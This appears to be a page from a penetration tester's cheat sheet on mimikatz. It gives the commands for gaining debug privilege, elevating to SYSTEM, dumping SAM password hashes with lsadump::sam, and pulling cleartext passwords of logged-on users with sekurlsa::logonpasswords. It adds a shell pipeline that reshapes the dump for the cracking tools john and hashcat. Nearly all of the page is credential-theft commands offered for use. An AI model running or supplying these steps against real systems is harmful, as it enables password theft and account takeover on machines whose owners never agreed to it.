search

mimikatz

hashtag
Dump Password Hashes

Mimikatz needs to be ran as SYSTEM and the SeDebugPrivilege access right needs to be enabled. After launching mimikatz, run:

privilege::debug
token::elevate

If you are already SYSTEM, you do not need to run the second command Now to dump the password hashes:

lsadump::sam

This prints out a funky format. To make it more john or hashcat friendly and be a user:hash format we can do this.

grep 'User' -A 1 lsadump.txt| grep -v '-' | cut -d ':' -f 2 | sed 's/ //' | sed '$!N;s/\n/:/'

hashtag
Dump Passwords of Logged on Users

It is possible to get clear text passwords of users that are logged on. After launching mimikatz, run:

privilege::debug
token::elevate

If you are already SYSTEM, you do not need to run the second command Now to dump the passwords & hashes:

sekurlsa::logonpasswords

hashtag
Resources

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Windows - Mimikatz.mdarrow-up-right

PreviouschiselNextmssqlclient.py

Last updated